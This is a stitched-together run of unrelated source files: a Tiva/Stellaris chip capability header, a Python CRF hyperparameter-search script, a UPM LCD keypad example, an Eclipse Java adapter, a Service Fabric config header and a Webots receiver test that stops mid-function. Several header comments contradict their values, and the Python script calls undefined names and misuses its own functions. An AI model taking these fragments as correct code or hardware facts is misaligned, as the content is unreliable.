# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S6965)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 4 /* Four 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# undef TIVA_ETHTS /* No timestamp register */
# define TIVA_NSSI 1 /* One SSI module */
# define TIVA_NUARTS 3 /* Three UART modules */
# define TIVA_NI2C 2 /* Two I2C modules */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 3 /* Three PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 7 /* 7 Ports (GPIOA-G), 0-42 GPIOs */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S9B96) || \
      defined(CONFIG_ARCH_CHIP_LM3S9B92)
#  define LM3S                 1  /* LM3S family */
#  undef  LM4F                    /* Not LM4F family */
#  undef  TM4C                    /* Not TM4C family */
#  undef  SIMPLELINK              /* Not SimpleLink family */
#  define TIVA_NTIMERS         4  /* Four 16/32-bit timers */
#  define TIVA_NWIDETIMERS     0  /* No 32/64-bit timers */
#  define TIVA_NWDT            1  /* One watchdog timer */
#  define TIVA_NETHCONTROLLERS 1  /* One Ethernet controller */
#  define TIVA_NLCD            0  /* No LCD controller */
#  undef  TIVA_ETHTS              /* No timestamp register */
#  define TIVA_NSSI            2  /* Two SSI modules */
#  define TIVA_NUARTS          3  /* Three UART modules */
#  define TIVA_NI2C            2  /* Two I2C modules */
#  define TIVA_NADC            2  /* Two ADC module */

   /* TIVA_CAN is a legacy name used only by this branch; the portable
    * macro is TIVA_NCANCONTROLLER below.  Kept for backward compatibility.
    */

#  define TIVA_CAN             2  /* Two CAN module */
#  define TIVA_NPWM            4  /* Four PWM generator modules */
#  define TIVA_NQEI            2  /* Two quadrature encoders */
#  define TIVA_NPORTS          9  /* 9 Ports (GPIOA-H,J) 0-65 GPIOs */

   /* Was inconsistently 0 while TIVA_CAN above said two: the LM3S9B96 and
    * LM3S9B92 both provide two CAN controllers.
    */

#  define TIVA_NCANCONTROLLER  2  /* Two CAN controllers */
#  define TIVA_NUSBOTGFS       0  /* No USB 2.0 OTG FS */
#  define TIVA_NUSBOTGHS       0  /* No USB 2.0 OTG HS */
#  define TIVA_NCRC            0  /* No CRC module */
#  define TIVA_NAES            0  /* No AES module */
#  define TIVA_NDES            0  /* No DES module */
#  define TIVA_NHASH           0  /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S8962)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Four 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 1 /* One SSI module */
# define TIVA_NUARTS 3 /* Two UART modules */
# define TIVA_NI2C 2 /* One I2C module */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 3 /* Three PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 7 /* 7 Ports (GPIOA-G), 5-42 GPIOs */
# define TIVA_NCANCONTROLLER 1 /* One CAN controller */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM4F120)
# undef LM3S /* Not LM3S family */
# define LM4F 1 /* LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timer timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 4 /* Four I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoders */
# define TIVA_NPORTS 6 /* 6 Ports (GPIOA-F), 0-43 GPIOs */
# define TIVA_NCANCONTROLLER 1 /* One CAN controller */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6ZRB)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder */
# define TIVA_NPORTS 15 /* Fifteen Ports (GPIOA-H, J-N, P-Q) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6PM)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 4 /* Four I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 6 /* Six Ports (GPIOA-F) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6PZ)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 10 /* Ten Ports (GPIOA-K) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6PGE)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 14 /* Fourteen Ports (GPIOA-P) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123AH6PM)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 7 /* Seven Ports (GPIOA-G) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C1294NCPDT)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 8 /* Eight Dual 16/32-bit timers A/B */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 1 /* One 10/100Mbit Ethernet controller */
# define TIVA_NLCD 1 /* One LCD controller */
# define TIVA_NSSI 4 /* Four SSI modules */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 10 /* Ten I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 4 /* Four PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder */
# define TIVA_NPORTS 15 /* Fifteen Ports (GPIOA-H, J-N, P-Q) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 1 /* One USB 2.0 OTG HS */
# define TIVA_NCRC 1 /* One CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C129ENCPDT)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 8 /* Eight Dual 16/32-bit timers A/B */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 1 /* One 10/100Mbit Ethernet controller */
# define TIVA_NLCD 1 /* One LCD controller */
# define TIVA_NSSI 4 /* Four SSI modules */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 10 /* Ten I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 4 /* Four PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder */
# define TIVA_NPORTS 15 /* Fifteen Ports (GPIOA-H, J-N, P-Q) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 1 /* One USB 2.0 OTG HS */
# define TIVA_NCRC 1 /* One CRC module */
# define TIVA_NAES 1 /* One AES module */
# define TIVA_NDES 1 /* One DES module */
# define TIVA_NHASH 1 /* One SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C129XNCZAD) || defined(CONFIG_ARCH_CHIP_TM4C129ENCZAD)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 8 /* Eight Dual 16/32-bit timers A/B */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 1 /* One 10/100Mbit Ethernet controller */
# define TIVA_NLCD 1 /* One LCD controller */
# define TIVA_NSSI 4 /* Four SSI modules */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 10 /* Ten I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 4 /* Four PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder module */
# define TIVA_NPORTS 18 /* Eighteen Ports (GPIOA-H, J-N, P-T) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 1 /* One USB 2.0 OTG HS */
# define TIVA_NCRC 1 /* One CRC module */
# define TIVA_NAES 1 /* One AES module */
# define TIVA_NDES 1 /* One DES module */
# define TIVA_NHASH 1 /* One SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_CC13X0)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# define SIMPLELINK 1 /* SimpleLink family */
# define TIVA_NTIMERS 4 /* Eight 16- or four 32-bit GPTM timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
/* One RF timer */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 2 /* Two SSI modules */
# define TIVA_NUARTS 1 /* One UART module */
# define TIVA_NI2C 1 /* One I2C module */
/* One I2S module */
# define TIVA_NADC 1 /* One 12-bit, 8 channel ADC module */
/* One continuous time comparator */
/* Ultra low power clocked comparator */
/* Programmable current source */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoder modules */
# define TIVA_NPORTS 1 /* One Port */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 1 /* One AES-128 module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
/* One TRNG module */
/* Capacitive sensing, up to 8 channels */
/* Integrated temperatore sensor */
#elif defined(CONFIG_ARCH_CHIP_CC13X2)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# define SIMPLELINK 1 /* SimpleLink family */
# define TIVA_NTIMERS 4 /* Eight 16- or four 32-bit GPTM timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 2 /* Two SSI modules */
# define TIVA_NUARTS 2 /* Two UART module */
# define TIVA_NI2C 1 /* One I2C module */
/* One I2S module */
/* One RTC */
# define TIVA_NADC 1 /* One 12-bit, 8 channel ADC module */
/* Two comparators with reference DAC */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoder modules */
# define TIVA_NPORTS 1 /* One Port */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 1 /* One AES-256 module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 1 /* SHA2 Accelerator (up to SHA-512) */
/* ECC and RSA Public Key Hardware Accelerator */
/* One TRNG module */
/* Capacitive sensing, up to 8 channels */
/* Integrated temperature and battery monitor */
#else
# error "Capabilities not specified for this TIVA/Stellaris chip"
#endif
/* The TIVA/Stellaris only supports 8 priority levels. The hardware
* priority mechanism will only look at the upper N bits of the 8-bit
* priority level (where N is 3 for the Tiva/Stellaris family), so any
* prioritization must be performed in those bits. The default priority
* level is set to the middle value
*/
#define NVIC_SYSH_PRIORITY_MIN 0xe0 /* Bits [7:5] set in minimum priority */
#define NVIC_SYSH_PRIORITY_DEFAULT 0x80 /* Midpoint is the default */
#define NVIC_SYSH_PRIORITY_MAX 0x00 /* Zero is maximum priority */
#define NVIC_SYSH_PRIORITY_STEP 0x20 /* Three bits of interrupt priority used */
/****************************************************************************
* Public Types
****************************************************************************/
/****************************************************************************
* Public Data
****************************************************************************/
/****************************************************************************
* Public Function Prototypes
****************************************************************************/
#endif /* __ARCH_ARM_INCLUDE_TIVA_CHIP_H */
| 12,810 |
785 | <reponame>fossilCreek/Parserator-training_process
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function

import random

import pycrfsuite
from sklearn.base import BaseEstimator
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import f1_score

from training import get_data_sklearn_format
def f1_with_flattening(estimator, X, y):
    """
    Calculate an F1 score by flattening the estimator's predictions across
    all sequences.  For example, given the address sequences

        ['1 My str', '2 Your blvd'],

    the per-token predictions are flattened into a single list such as

        ['AddressNumber', 'StreetName', 'StreetNamePostType',
         'AddressNumber', 'StreetName', 'StreetNamePostType']

    and compared against the similarly flattened gold-standard labels.  This
    measures overall model quality across all sequences rather than quality
    on any particular sequence.

    :param X: list of sequences to tag
    :param y: list of gold standard tuples
    """
    predictions = estimator.predict(X)
    flat_pred = []
    flat_gold = []
    # Only sequences whose predicted length matches the gold length can be
    # compared token-for-token; mismatched sequences are skipped.
    for pred_seq, gold_seq in zip(predictions, y):
        if len(pred_seq) == len(gold_seq):
            flat_pred.extend(pred_seq)
            flat_gold.extend(gold_seq)
    return f1_score(flat_gold, flat_pred)
def get_data_sklearn_format(train_file_list, module):
    """
    Parse the specified training-data files and return them in sklearn format.

    :param train_file_list: iterable of training-data file paths
    :param module: parser module whose GROUP_LABEL names the XML group tag
    :return: tuple of:
        1) list of training sequences, each of which is a raw string
        2) list of gold-standard labels, each of which is a tuple of
           strings, one per token in the corresponding training sequence
    """
    # NOTE(review): this definition shadows the identically named import from
    # `training` at the top of the file, and the __main__ block below calls
    # the function with no arguments -- confirm which implementation is
    # actually intended.
    # NOTE(review): readTrainingData must be in scope at call time
    # (presumably from parserator's data-prep utilities) -- verify.
    data = list(readTrainingData(train_file_list, module.GROUP_LABEL))
    # Shuffle so cross-validation folds are not biased by file order
    # (requires `import random`, now added at the top of the file).
    random.shuffle(data)

    x, y = [], []
    for raw_string, components in data:
        tokens, labels = zip(*components)
        x.append(raw_string)
        y.append(labels)

    return x, y
class SequenceEstimator(BaseEstimator):
    """
    A sklearn-compatible wrapper for a parser trainer.
    """

    def __init__(self, c1=1, c2=1, feature_minfreq=0):
        """
        :param c1: L1 regularisation coefficient
        :param c2: L2 regularisation coefficient
        :param feature_minfreq: minimum feature frequency
        :return:
        """
        self.c1 = c1
        self.c2 = c2
        self.feature_minfreq = feature_minfreq

    def fit(self, X, y, model_path='model.crfsuite', **fit_params):
        """
        Train a CRF model on the given sequences and write it to model_path.

        BUGFIX: the original signature was
        ``def fit(self, X, y, **params, model_path)`` which is a SyntaxError
        (var-keyword argument must come last) and also collided with the
        local ``params`` dict below.  ``model_path`` now has a default so
        sklearn's ``fit(X, y)`` calls still work.

        :param X: list of raw training strings
        :param y: list of label tuples, one tuple per training string
        :param model_path: file the trained crfsuite model is written to
        """
        # sklearn requires parameters to be declared as fields of the
        # estimator, and we can't have a full stop there.  Replace the
        # underscore with a dot to recover the native crfsuite option names.
        params = {k.replace('_', '.'): v for k, v in self.__dict__.items()}
        trainer = pycrfsuite.Trainer(verbose=False, params=params)
        # NOTE(review): tokenize, tokens2features and parserator must be in
        # scope at call time -- they are not imported in this file; verify.
        for raw_text, labels in zip(X, y):
            tokens = tokenize(raw_text)
            trainer.append(tokens2features(tokens), labels)
        trainer.train(model_path)
        reload(parserator)  # pick up the freshly written model file

    def predict(self, X):
        """Tag each sequence in X, returning one label list per sequence."""
        reload(parserator)  # tagger object is defined at the module level, update now
        predictions = []
        for sequence in X:
            predictions.append([foo[1] for foo in parserator.parse(sequence)])
        return predictions
if __name__ == '__main__':
    # Grid-search the CRF hyperparameters, scoring each candidate with the
    # flattened F1 metric defined above.
    # refer to http://www.chokkan.org/software/crfsuite/manual.html
    # for description of parameters
    cv = GridSearchCV(SequenceEstimator(), {'c1': [10 ** x for x in range(-2, 2)],
                                            'c2': [10 ** x for x in range(-2, 4)],
                                            'feature_minfreq': [0, 3, 5]},
                      scoring=f1_with_flattening, verbose=5)
    # NOTE(review): the local get_data_sklearn_format defined above requires
    # (train_file_list, module), but this call passes no arguments -- it can
    # only succeed if the zero-argument import from `training` is intended.
    X, y = get_data_sklearn_format()
    cv.fit(X, y)
    # Report the best parameter combination and the score of every candidate.
    print(cv.best_params_)
    for foo in cv.grid_scores_:
        print(foo)
| 1,570 |
619 | <reponame>moredu/upm<filename>examples/c++/lcdks.cxx
/*
* Author: <NAME> <<EMAIL>>
* Copyright (c) 2017 Intel Corporation.
*
* The MIT License
*
* This program and the accompanying materials are made available under the
* terms of the The MIT License which is available at
* https://opensource.org/licenses/MIT.
*
* SPDX-License-Identifier: MIT
*/
#include <iostream>
#include <signal.h>
#include "lcdks.hpp"
#include "upm_utilities.h"
using namespace std;
bool shouldRun = true;
// Flip the run flag on Ctrl-C so the main loop can terminate cleanly.
void
sig_handler(int signo)
{
    if (signo != SIGINT)
        return;
    shouldRun = false;
}
int
main(int argc, char** argv)
{
signal(SIGINT, sig_handler);
//! [Interesting]
// Instantiate a LCDKS (LCD Keypad Shield) using default pins
// NOTE: The default pins do not include support for a gpio
// controlled backlight. If you need one, you will need to specify
// all neccessary pins to the constructor.
upm::LCDKS lcd;
lcd.setCursor(0, 0);
lcd.write("LCDKS driver");
lcd.setCursor(1, 2);
lcd.write("Hello World");
// output current key value every second.
while (shouldRun) {
cout << "Button value: " << lcd.getKeyValue() << endl;
upm_delay(1);
}
//! [Interesting]
return 0;
}
| 480 |
375 | /*
* Copyright 2016 Nokia Solutions and Networks
* Licensed under the Apache License, Version 2.0,
* see license.txt file for details.
*/
package org.robotframework.ide.eclipse.main.plugin.mockeclipse;
import org.eclipse.core.resources.IResource;
import org.eclipse.core.runtime.IAdaptable;
/**
 * Adapts a wrapped {@link IResource}: getAdapter returns the resource when it
 * is an instance of the requested type, otherwise {@code null}.
 */
public class WrappedResource implements IAdaptable {

    private final IResource wrapped;

    public WrappedResource(final IResource resourceToWrap) {
        this.wrapped = resourceToWrap;
    }

    @SuppressWarnings("unchecked")
    @Override
    public Object getAdapter(@SuppressWarnings("rawtypes") final Class adapter) {
        return adapter.isInstance(wrapped) ? adapter.cast(wrapped) : null;
    }
}
| 303 |
2,542 | // ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#pragma once
namespace TxnReplicator
{
    // Shared-log configuration values for the transactional replicator.
    // DECLARE_COMPONENT_CONFIG / SL_CONFIG_PROPERTIES are project macros that
    // expand to the actual property declarations (see Common::ComponentConfig
    // and SLConfigBase); the "Invalid" strings are the section-name arguments
    // passed to those macros.
    class SLConfigValues :
        public Common::ComponentConfig,
        public SLConfigBase
    {
        DECLARE_COMPONENT_CONFIG(SLConfigValues, "Invalid");
        SL_CONFIG_PROPERTIES(L"Invalid");
    };
| 160 |
1,561 | <reponame>victorhu3/webots<filename>tests/api/controllers/emitter_receiver_invalid_function_call/emitter_receiver_invalid_function_call.c<gh_stars>1000+
/*
* Description: Test robustness Emitter and Receiver function calling them
* with wrong arguments.
*/
#include <webots/emitter.h>
#include <webots/receiver.h>
#include <webots/robot.h>
#include "../../../lib/ts_assertion.h"
#include "../../../lib/ts_utils.h"
#define TIME_STEP 32
#define IS_VERBOSE 0
/* Emit a trace line, but only when verbose logging is compiled in. */
void sendLog(const char *text) {
  if (IS_VERBOSE) {
    printf("%s\n", text);
  }
}
int main(int argc, char **argv) {
ts_setup(argv[1]);
WbDeviceTag emitter = 0;
WbDeviceTag receiver = 0;
WbDeviceTag otherDevice = 0;
int queueLength, i;
double d;
const char *buffer;
const double *doubleArray;
// messages
const char *msgString0 = "Hello";
if (strcmp(wb_robot_get_name(), "robot_emitter") == 0) {
emitter = wb_robot_get_device("emitter"); // radio, channel 2
otherDevice = wb_robot_get_device("receiver");
} else if (strcmp(wb_robot_get_name(), "robot_receiver") == 0) {
receiver = wb_robot_get_device("receiver"); // radio, channel -1
otherDevice = wb_robot_get_device("gps");
}
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, 0, "Get sampling period of a disabled receiver should return 0 not %d", i);
wb_robot_step(TIME_STEP);
// TEST 1: enable/disable invalid receiver
if (receiver) {
wb_receiver_enable(receiver, TIME_STEP + 5);
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, TIME_STEP + 5, "Get sampling period of a just enabled receiver should return %d not %d",
TIME_STEP + 5, i);
sendLog("Enable NULL receiver");
wb_receiver_enable(0, TIME_STEP);
i = wb_receiver_get_sampling_period(0);
ts_assert_int_equal(i, 0, "Get sampling period of a NULL receiver should return %d not %d", 0, TIME_STEP);
sendLog("Disable NULL receiver");
wb_receiver_disable(0);
sendLog("Enable an invalid receiver");
wb_receiver_enable(otherDevice, TIME_STEP);
i = wb_receiver_get_sampling_period(otherDevice);
ts_assert_int_equal(i, 0, "Get sampling period of an invalid receiver should return %d not %d", 0, TIME_STEP);
sendLog("Disable an invalid receiver");
wb_receiver_disable(otherDevice);
wb_robot_step(TIME_STEP);
sendLog("Enable an already enabled receiver with different sampling period");
wb_receiver_enable(receiver, TIME_STEP);
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, TIME_STEP, "Get sampling period of an already enabled receiver should be changed to %d not %d",
TIME_STEP, i);
wb_robot_step(TIME_STEP);
sendLog("Enable an already enabled receiver with sampling period < 0");
wb_receiver_enable(receiver, -7);
i = wb_receiver_get_sampling_period(receiver);
ts_assert_int_equal(i, TIME_STEP,
"Get sampling period of an enabled receiver should be %d not %d: sampling period < 0 is not valid",
TIME_STEP, i);
} else if (emitter) {
wb_robot_step(TIME_STEP);
wb_robot_step(TIME_STEP);
}
